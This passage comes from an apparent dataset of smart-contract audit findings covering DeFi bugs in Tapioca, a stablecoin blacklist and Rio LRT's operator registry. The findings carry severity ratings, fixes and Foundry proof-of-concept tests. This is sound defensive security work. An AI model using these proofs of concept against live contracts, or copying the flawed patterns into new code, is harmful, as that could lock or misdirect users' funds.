A previously found issue is still present in the codebase which allows secondary Big Bang markets interest rates to be manipulated, allowing the attacker to perform profitable strategies and potentially affecting users.",```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n +`TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken,medium,"The `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract.\\n`TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken.\\nLet's examine it more closely:\\nAfter checking the whitelisting status for the `marketHelper`, `magnetar` and the `market` contracts an approval is made to the Magnetar contract.\\n`MagnetarCollateralModule::depositAddCollateralAndBorrowFromMarket` get called with the passed parameters.\\nIf the `data.deposit` is true, the Magnetar contract will call `_extractTokens` with the following params: `from = msg_.user`, `token = collateralAddress` and `amount = msg_.collateralAmount`.\\n```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = 
IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n\\nThe collateral gets transferred into the Magnetar contract in case the `msg._user` has given sufficient allowance to the Magnetar contract through the Pearlmit contract.\\nAfter this `_setApprovalForYieldBox(data.market, yieldBox_);` is called that sets the allowance of the Magnetar contract to the Market contract.\\nThen `addCollateral` is called on the Market contract. I've inlined the internal function to make it easier to follow:\\n```\\n function _addCollateral(address from, address to, bool skim, uint256 amount, uint256 share) internal {\\n if (share == 0) {\\n share = yieldBox.toShare(collateralId, amount, false);\\n }\\n uint256 oldTotalCollateralShare = totalCollateralShare;\\n userCollateralShare[to] += share;\\n totalCollateralShare = oldTotalCollateralShare + share;\\n\\n // yieldBox.transfer(from, address(this), _assetId, share);\\n bool isErr = pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nAfter the `userCollateralShare` mapping is updated `pearlmit.transferFromERC1155(from, address(this), address(yieldBox), collateralId, share);` gets called.\\nThis is critical as now the Magnetar is supposed to transfer the ERC1155 tokens(Yieldbox) to the Market contract.\\nIn order to do this the Magnetar contract should have given the allowance to the Market contract through the Pearlmit contract.\\nThis is not the case, the Magnetar has only executed `_setApprovalForYieldBox(data.market, yieldBox_);`, nothing else.\\nIt will revert inside the Pearlmit contract `transferFromERC1155` function when the allowance is being checked.\\nOther occurrences\\n`TOFT::mintLendXChainSGLXChainLockAndParticipateReceiver` has a similar issue as:\\nExtract the bbCollateral from the user, sets approval for 
the BigBang contract through YieldBox.\\nBut then inside the `BBCollateral::addCollateral` the `_addTokens` again expects an allowance through the Pearlmit contract.\\n`TOFT::lockAndParticipateReceiver` calls the `Magnetar:lockAndParticipate` where:\\n```\\n## MagnetarMintCommonModule.sol\\n\\nfunction _lockOnTOB(\\n IOptionsLockData memory lockData,\\n IYieldBox yieldBox_,\\n uint256 fraction,\\n bool participate,\\n address user,\\n address singularityAddress\\n ) internal returns (uint256 tOLPTokenId) {\\n // rest of code.\\n _setApprovalForYieldBox(lockData.target, yieldBox_);\\n tOLPTokenId = ITapiocaOptionLiquidityProvision(lockData.target).lock(\\n participate ? address(this) : user, singularityAddress, lockData.lockDuration, lockData.amount\\n );\\n}\\n\\n## TapiocaOptionLiquidityProvision.sol\\n\\nfunction lock(address _to, IERC20 _singularity, uint128 _lockDuration, uint128 _ybShares)\\n external\\n nonReentrant\\n returns (uint256 tokenId)\\n{\\n // Transfer the Singularity position to this contract\\n // yieldBox.transfer(msg.sender, address(this), sglAssetID, _ybShares);\\n {\\n bool isErr =\\n pearlmit.transferFromERC1155(msg.sender, address(this), address(yieldBox), sglAssetID, _ybShares);\\n if (isErr) {\\n revert TransferFailed();\\n }\\n }\\n```\\n\\nThe same issue where approval through the Pearlmit contract is expected.",Review all the allowance mechanisms and ensure that they are correct.,The `TOFTMarketReceiverModule::marketBorrowReceiver` flow is broken and will revert when the Magnetar contract tries to transfer the ERC1155 tokens to the Market contract. 
There are also other instances of similar issues.,"```\\n function _extractTokens(address _from, address _token, uint256 _amount) internal returns (uint256) {\\n uint256 balanceBefore = IERC20(_token).balanceOf(address(this));\\n // IERC20(_token).safeTransferFrom(_from, address(this), _amount);\\n pearlmit.transferFromERC20(_from, address(this), address(_token), _amount);\\n uint256 balanceAfter = IERC20(_token).balanceOf(address(this));\\n if (balanceAfter <= balanceBefore) revert Magnetar_ExtractTokenFail();\\n return balanceAfter - balanceBefore;\\n }\\n```\\n" +Blacklisted accounts can still transact.,medium,"Accounts that have been blacklisted by the `BLACKLISTER_ROLE` continue to transact normally.\\nCurrently, the only real effect of blacklisting an account is the seizure of `Stablecoin` funds:\\n```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n\\nHowever, following a call to `addBlackList(address)`, the blacklisted account may continue to transact using `Stablecoin`.\\nCombined with previous audit reports, which attest to the blacklist function's susceptibility to frontrunning, the current implementation of the blacklist operation can effectively be considered a no-op.","ERC20s that enforce blacklists normally prevent a sanctioned address from being able to transact:\\n📄 Stablecoin.sol\\n```\\n// Add the line below\\n error Blacklisted(address account);\\n\\n// Add the line below\\nfunction _update(address from, address to, uint256 value) internal virtual override {\\n// Add the line below\\n\\n// Add the line below\\n if (blacklisted(from)) revert Blacklisted(from); \\n// Add the line below\\n if (blacklisted(to)) revert 
Blacklisted(to);\\n// Add the line below\\n\\n// Add the line below\\n super._update(from, to, value);\\n// Add the line below\\n}\\n```\\n","Medium, as this is the failure of a manually administered security feature.","```\\n/**\\n * @notice Overrides Blacklist function to transfer balance of a blacklisted user to the caller.\\n * @dev This function is called internally when an account is blacklisted.\\n * @param user The blacklisted user whose balance will be transferred.\\n */\\nfunction _onceBlacklisted(address user) internal override {\\n _transfer(user, _msgSender(), balanceOf(user));\\n}\\n```\\n" +"Setting the strategy cap to ""0"" does not update the total shares held or the withdrawal queue",high,"Removing or setting the strategy cap to 0 will not decrease the shares held in the system. Additionally, it will not update the withdrawal queue, which means users can request withdrawals, and the withdrawals will exceed the allocated amount when rebalance occurs.\\nLet's go over the issue with an example:\\nAssume there is 1 strategy and 2 operators active in an LSR with total strategy shares holding is 1000 * 1e18 where both operators shares 500-500 the assets.\\nWhen the owner decides to inactivate or just simply sets one of the operators cap to ""0"" the operator will withdraw all its assets as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . 
\\n // @review this ""if"" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n .\\n // @review asks delegator to exit\\n -> bytes32 withdrawalRoot = delegator.queueWithdrawalForOperatorExit(strategy, sharesToExit);\\n emit IRioLRTOperatorRegistry.OperatorStrategyExitQueued(operatorId, strategy, sharesToExit, withdrawalRoot);\\n }\\n```\\n\\nThen the operator delegator contract calls the EigenLayer to withdraw all its balance as follows:\\n```\\nfunction _queueWithdrawalForOperatorExitOrScrape(address strategy, uint256 shares) internal returns (bytes32 root) {\\n . 
// @review jumps to internal function\\n -> root = _queueWithdrawal(strategy, shares, address(depositPool()));\\n }\\n\\nfunction _queueWithdrawal(address strategy, uint256 shares, address withdrawer) internal returns (bytes32 root) {\\n IDelegationManager.QueuedWithdrawalParams[] memory withdrawalParams = new IDelegationManager.QueuedWithdrawalParams[](1);\\n withdrawalParams[0] = IDelegationManager.QueuedWithdrawalParams({\\n strategies: strategy.toArray(),\\n shares: shares.toArray(),\\n withdrawer: withdrawer\\n });\\n // @review calls Eigen layer to queue all the balance and returns the root\\n -> root = delegationManager.queueWithdrawals(withdrawalParams)[0];\\n }\\n```\\n\\nWhich we can observe from the above snippet the EigenLayer is called for the withdrawal and then the entire function execution ends. The problem is `assetRegistry` still thinks there are 1000 * 1e18 EigenLayer shares in the operators. Also, the `withdrawalQueue` is not aware of this withdrawal request which means that users can call `requestWithdrawal` to withdraw up to 1000 * 1e18 EigenLayer shares worth LRT but in reality the 500 * 1e18 portion of it already queued in withdrawal by the owner of operator registry.\\nCoded PoC:\\n```\\nfunction test_SettingStrategyCapZero_WithdrawalsAreDoubleCountable() public {\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](2);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: RETH_STRATEGY, cap: 0});\\n zeroStrategyShareCaps[1] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n uint8 operatorId = addOperatorDelegator(reLST.operatorRegistry, address(reLST.rewardDistributor));\\n\\n uint256 AMOUNT = 111e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into 
EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n vm.recordLogs();\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(operatorId, zeroStrategyShareCaps);\\n\\n Vm.Log[] memory entries = vm.getRecordedLogs();\\n assertGt(entries.length, 0);\\n\\n for (uint256 i = 0; i < entries.length; i++) {\\n if (entries[i].topics[0] == keccak256('OperatorStrategyExitQueued(uint8,address,uint256,bytes32)')) {\\n uint8 emittedOperatorId = abi.decode(abi.encodePacked(entries[i].topics[1]), (uint8));\\n (address strategy, uint256 sharesToExit, bytes32 withdrawalRoot) =\\n abi.decode(entries[i].data, (address, uint256, bytes32));\\n\\n assertEq(emittedOperatorId, operatorId);\\n assertEq(strategy, CBETH_STRATEGY);\\n assertEq(sharesToExit, AMOUNT);\\n assertNotEq(withdrawalRoot, bytes32(0));\\n\\n break;\\n }\\n if (i == entries.length - 1) fail('Event not found');\\n }\\n\\n // @review add these\\n // @review all the eigen layer shares are already queued as we checked above, now user requestWithdrawal\\n // of the same amount of EigenLayer share worth of LRT which there will be double counting when epoch is settled.\\n uint256 queuedShares = reLST.coordinator.requestWithdrawal(address(cbETH), lrtAmount);\\n console.log(""Queued shares"", queuedShares);\\n }\\n```\\n","Update the withdrawal queue when the operator registry admin changes the EigenLayer shares amount by either removing an operator or setting its strategy cap to ""0"".","High, because the users withdrawals will never go through in rebalancing because of double counting of the same share withdrawals.","```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n . 
\\n // @review this ""if"" will be executed\\n -> if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n utilizationHeap.removeByID(operatorId);\\n } else if (currentShareDetails.cap == 0 && newShareCap.cap > 0) {\\n // If the current cap is 0 and the new cap is greater than 0, insert the operator into the heap.\\n utilizationHeap.insert(OperatorUtilizationHeap.Operator(operatorId, 0));\\n } else {\\n // Otherwise, update the operator's utilization in the heap.\\n utilizationHeap.updateUtilizationByID(operatorId, currentShareDetails.allocation.divWad(newShareCap.cap));\\n }\\n .\\n }\\n```\\n" +"swapValidatorDetails incorrectly writes keys to memory, resulting in permanently locked beacon chain deposits",high,"When loading BLS public keys from storage to memory, the keys are partly overwritten with zero bytes. 
This ultimately causes allocations of these malformed public keys to permanently lock deposited ETH in the beacon chain deposit contract.\\nValidatorDetails.swapValidatorDetails is used by RioLRTOperatorRegistry.reportOutOfOrderValidatorExits to swap the details in storage of validators which have been exited out of order:\\n```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n\\nIn swapValidatorDetails, for each swap to occur, we load two keys into memory from storage:\\n```\\nkeyOffset1 = position.computeStorageKeyOffset(operatorId, startIndex1);\\nkeyOffset2 = position.computeStorageKeyOffset(operatorId, startIndex2);\\nassembly {\\n // Load key1 into memory\\n let _part1 := sload(keyOffset1) // Load bytes 0..31\\n let _part2 := sload(add(keyOffset1, 1)) // Load bytes 32..47\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := iszero(or(_part1, _part2)) // Store if key1 is empty\\n\\n // Load key2 into memory\\n _part1 := sload(keyOffset2) // Load bytes 0..31\\n _part2 := sload(add(keyOffset2, 1)) // Load bytes 32..47\\n mstore(add(key2, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key2, 0x30), shr(128, _part2)) // Store bytes 16..47\\n\\n isEmpty := or(isEmpty, iszero(or(_part1, _part2))) // Store if key1 or key2 is empty\\n}\\n```\\n\\nThe problem here is that when we store the keys in memory, they don't end up as intended. Let's look at how it works to see where it goes wrong.\\nThe keys used here are BLS public keys, with a length of 48 bytes, e.g.: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`. 
As such, previously to entering this for loop, we initialize key1 and key2 in memory as 48 byte arrays:\\n```\\nbytes memory key1 = new bytes(48);\\nbytes memory key2 = new bytes(48);\\n```\\n\\nSince they're longer than 32 bytes, they have to be stored in two separate storage slots, thus we do two sloads per key to retrieve `_part1` and `_part2`, containing the first 32 bytes and the last 16 bytes respectively.\\nThe following lines are used with the intention of storing the key in two separate memory slots, similarly to how they're stored in storage:\\n```\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n```\\n\\nThe problem however is that the second mstore shifts `_part2` 128 bits to the right, causing the leftmost 128 bits to zeroed. Since this mstore is applied only 16 (0x10) bytes after the first mstore, we overwrite bytes 16..31 with zero bytes. We can test this in chisel to prove it:\\nUsing this example key: `0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb8af94bc3ba4d4bfa93d087d522e4b78d`\\nWe assign the first 32 bytes to _part1:\\n```\\nbytes32 _part1 = 0x95cfcb859956953f9834f8b14cdaa939e472a2b5d0471addbe490b97ed99c6eb\\n```\\n\\nWe assign the last 16 bytes to _part2:\\n```\\nbytes32 _part2 = bytes32(bytes16(0x8af94bc3ba4d4bfa93d087d522e4b78d))\\n```\\n\\nWe assign 48 bytes in memory for key1:\\n```\\nbytes memory key1 = new bytes(48);\\n```\\n\\nAnd we run the following snippet from swapValidatorDetails in chisel:\\n```\\nassembly {\\n mstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n mstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\n}\\n```\\n\\nNow we can check the resulting memory using `!memdump`, which outputs the following:\\n```\\n➜ !memdump\\n[0x00:0x20]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x20:0x40]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x40:0x60]: 
0x00000000000000000000000000000000000000000000000000000000000000e0\\n[0x60:0x80]: 0x0000000000000000000000000000000000000000000000000000000000000000\\n[0x80:0xa0]: 0x0000000000000000000000000000000000000000000000000000000000000030\\n[0xa0:0xc0]: 0x95cfcb859956953f9834f8b14cdaa93900000000000000000000000000000000\\n[0xc0:0xe0]: 0x8af94bc3ba4d4bfa93d087d522e4b78d00000000000000000000000000000000\\n```\\n\\nWe can see from the memory that at the free memory pointer, the length of key1 is defined 48 bytes (0x30), and following it is the resulting key with 16 bytes zeroed in the middle of the key.","We can solve this by simply mstoring `_part2` prior to mstoring `_part1`, allowing the mstore of `_part1` to overwrite the zero bytes from _part2:\\n```\\nmstore(add(key1, 0x30), shr(128, _part2)) // Store bytes 16..47\\nmstore(add(key1, 0x20), _part1) // Store bytes 0..31\\n```\\n\\nNote that the above change must be made for both keys.","Whenever we swapValidatorDetails using reportOutOfOrderValidatorExits, both sets of validators will have broken public keys and when allocated to will cause ETH to be permanently locked in the beacon deposit contract.\\nWe can see how this manifests in allocateETHDeposits where we retrieve the public keys for allocations:\\n```\\n// Load the allocated validator details from storage and update the deposited validator count.\\n(pubKeyBatch, signatureBatch) = ValidatorDetails.allocateMemory(newDepositAllocation);\\nVALIDATOR_DETAILS_POSITION.loadValidatorDetails(\\n operatorId, validators.deposited, newDepositAllocation, pubKeyBatch, signatureBatch, 0\\n);\\n// rest of code\\nallocations[allocationIndex] = OperatorETHAllocation(operator.delegator, newDepositAllocation, pubKeyBatch, signatureBatch);\\n```\\n\\nWe then use the public keys to stakeETH:\\n```\\n(uint256 depositsAllocated, IRioLRTOperatorRegistry.OperatorETHAllocation[] memory allocations) = operatorRegistry.allocateETHDeposits(\\n depositCount\\n);\\ndepositAmount = 
depositsAllocated * ETH_DEPOSIT_SIZE;\\n\\nfor (uint256 i = 0; i < allocations.length; ++i) {\\n uint256 deposits = allocations[i].deposits;\\n\\n IRioLRTOperatorDelegator(allocations[i].delegator).stakeETH{value: deposits * ETH_DEPOSIT_SIZE}(\\n deposits, allocations[i].pubKeyBatch, allocations[i].signatureBatch\\n );\\n}\\n```\\n\\nUltimately for each allocation, the public key is passed to the beacon DepositContract.deposit where it deposits to a public key for which we don't have the associated private key and thus can never withdraw.","```\\n// Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\nVALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n```\\n" +`reportOutOfOrderValidatorExits` does not updates the heap order,high,"When an operator's validator exits without a withdrawal request, the owner can invoke the `reportOutOfOrderValidatorExits` function to increase the `exited` portion of the operator validators. However, this action does not update the heap. 
Consequently, during subsequent allocation or deallocation processes, the heap may incorrectly mark validators as `exited`.\\nFirst, let's see how the utilization is determined for native ETH deposits for operators which is calculated as: `operatorShares.allocation.divWad(operatorShares.cap)` where as the allocation is the total `deposited` validators and the `cap` is predetermined value by the owner of the registry.\\nWhen the heap is retrieved from the storage, here how it is fetched:\\n```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nas we can see, the heap is always assumed to be order in the storage when the registry fetches it initially. 
There are no ordering of the heap when requesting the heap initially.\\nWhen, say the deallocation happens via an user withdrawal request, the queue can exit early if the operator in the heap has ""0"" room:\\n```\\n function deallocateETHDeposits(uint256 depositsToDeallocate) external onlyCoordinator returns (uint256 depositsDeallocated, OperatorETHDeallocation[] memory deallocations) {\\n deallocations = new OperatorETHDeallocation[](s.activeOperatorCount);\\n\\n\\n OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForETH();\\n if (heap.isEmpty()) revert NO_AVAILABLE_OPERATORS_FOR_DEALLOCATION();\\n\\n\\n uint256 deallocationIndex;\\n uint256 remainingDeposits = depositsToDeallocate;\\n\\n\\n bytes memory pubKeyBatch;\\n while (remainingDeposits > 0) {\\n uint8 operatorId = heap.getMax().id;\\n\\n\\n OperatorDetails storage operator = s.operatorDetails[operatorId];\\n OperatorValidatorDetails memory validators = operator.validatorDetails;\\n -> uint256 activeDeposits = validators.deposited - validators.exited;\\n\\n\\n // Exit early if the operator with the highest utilization rate has no active deposits,\\n // as no further deallocations can be made.\\n -> if (activeDeposits == 0) break;\\n .\\n }\\n .\\n }\\n```\\n\\n`reportOutOfOrderValidatorExits` increases the ""exited"" part of the operators validator:\\n```\\nfunction reportOutOfOrderValidatorExits(uint8 operatorId, uint256 fromIndex, uint256 validatorCount) external {\\n .\\n .\\n // Swap the position of the validators starting from the `fromIndex` with the validators that were next in line to be exited.\\n VALIDATOR_DETAILS_POSITION.swapValidatorDetails(operatorId, fromIndex, validators.exited, validatorCount);\\n -> operator.validatorDetails.exited += uint40(validatorCount);\\n\\n emit OperatorOutOfOrderValidatorExitsReported(operatorId, validatorCount);\\n }\\n```\\n\\nNow, knowing all these above, let's do an example where calling `reportOutOfOrderValidatorExits` can make the heap 
work wrongly and exit prematurely.\\nAssume there are 3 operators which has native ETH deposits. operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 15%\\nsuch operators would be ordered in the heap as: heap.operators[1] -> operatorId: 1, utilization: 5 heap.operators[2] -> operatorId: 2, utilization: 10 heap.operators[3] -> operatorId: 3, utilization: 15 heap.getMin() -> operatorId: 1, utilization: 5 heap.getMax() -> operatorId:3, utilization 15\\nnow, let's say the ""cap"" is 100 for all of the operators which means that: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 0 operatorId 3 -> validator.deposits = 15, validator.exit = 0\\nLet's assume that the operator 3 exits 15 validator from beacon chain without prior to a user request, which is a reason for owner to call `reportOutOfOrderValidatorExits` to increase the exited validators.\\nWhen the owner calls `reportOutOfOrderValidatorExits` for the operatorId 3, the exited will be 15 for the operatorId 3. After the call the operators validator balances will be: operatorId 1 -> validator.deposits = 5, validator.exit = 0 operatorId 2 -> validator.deposits = 10, validator.exit = 8 operatorId 3 -> validator.deposits = 15, validator.exit = 15\\nhence, the utilizations will be: operatorId 1 -> utilization 5% operatorId 2 -> utilization 10% operatorId 3 -> utilization 0%\\nwhich means now the operatorId 3 has the lowest utilization and should be the first to get deposits and last to unwind deposits from. 
However, the heap is not re-ordered meaning that the minimum in the heap is still opeartorId 1 and the maximum is still operatorId 3!\\nNow, when a user tries to withdraw, the first deallocation target will be the operatorId 3 because the heap thinks that it is the most utilized still.\\nHence, the user will not be able to request the withdrawal!\\nCoded PoC:\\n```\\n// forge test --match-contract OperatorUtilizationHeapTest --match-test test_RemovingValidatorMessesTheHeap -vv\\n function test_RemovingValidatorMessesTheHeap() public {\\n OperatorUtilizationHeap.Data memory heap = OperatorUtilizationHeap.initialize(5);\\n\\n // @review initialize and order 3 operators \\n heap.insert(OperatorUtilizationHeap.Operator({id: 1, utilization: 5}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 2, utilization: 10}));\\n heap.store(heapStore);\\n\\n heap.insert(OperatorUtilizationHeap.Operator({id: 3, utilization: 15}));\\n heap.store(heapStore);\\n\\n // @review mimick how the heap can be fetched from the storage initially\\n uint8 numActiveOperators = 3;\\n OperatorUtilizationHeap.Data memory newHeap = OperatorUtilizationHeap.initialize(64);\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = heapStore.get(i);\\n if (operatorId == 0) break;\\n\\n newHeap.operators[i+1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: heap.operators[operatorId].utilization\\n });\\n }\\n newHeap.count = i;\\n\\n // @review assume the reportValidatorAndExits called, and now the utilization is ""0""\\n heap.updateUtilizationByID(3, 0);\\n // @review this should be done, but the heap is not stored! 
\\n // heap.store(heapStore);\\n\\n console.log(""1st"", heap.operators[1].id);\\n console.log(""2nd"", heap.operators[2].id);\\n console.log(""3rd"", heap.operators[3].id);\\n console.log(""origin heaps min"", heap.getMin().id);\\n console.log(""origin heaps max"", heap.getMax().id);\\n\\n console.log(""1st"", newHeap.operators[1].id);\\n console.log(""2nd"", newHeap.operators[2].id);\\n console.log(""3rd"", newHeap.operators[3].id);\\n console.log(""new heaps min"", newHeap.getMin().id);\\n console.log(""new heaps max"", newHeap.getMax().id);\\n\\n // @review mins and maxs are mixed\\n assertEq(newHeap.getMin().id, 1);\\n assertEq(heap.getMin().id, 3);\\n assertEq(heap.getMax().id, 2);\\n assertEq(newHeap.getMax().id, 3);\\n }\\n```\\n",update the utilization in the reportOutOfOrderValidatorExits function,"Heap can be mixed, withdrawals and deposits can fail, hence I will label this as high.","```\\nfunction getOperatorUtilizationHeapForETH(RioLRTOperatorRegistryStorageV1.StorageV1 storage s)\\n internal\\n view\\n returns (OperatorUtilizationHeap.Data memory heap)\\n {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n\\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n\\n uint256 activeDeposits;\\n IRioLRTOperatorRegistry.OperatorValidatorDetails memory validators;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = s.activeOperatorsByETHDepositUtilization.get(i);\\n\\n // Non-existent operator ID. 
We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n validators = s.operatorDetails[operatorId].validatorDetails;\\n activeDeposits = validators.deposited - validators.exited;\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n utilization: activeDeposits.divWad(validators.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n" +Heap is incorrectly stores the removed operator ID which can lead to division by zero in deposit/withdrawal flow,high,"An operator's strategy can be reset by the owner calling `setOperatorStrategyCaps` to ""0"". This action sets the utilization to ""0"" and removes the operator from the heap. Consequently, this means that the operator has unwound all its strategy shares and can no longer receive any more deposits. However, due to how the heap is organized, if an operator who had funds before is reset to ""0"", the heap will not successfully remove the operator. As a result, when ordering the heap, a division by ""0"" will occur, causing the transaction to revert on deposits and withdrawals indefinitely.\\nIn order to break down the issue, let's divide the issue to 2 parts which their combination is the issue itself\\n1- Heap is not removing the removed ID from the heaps storage when the operator is removed\\nWhen the operator is removed, the operator will be removed from the heap as follows:\\n```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n 
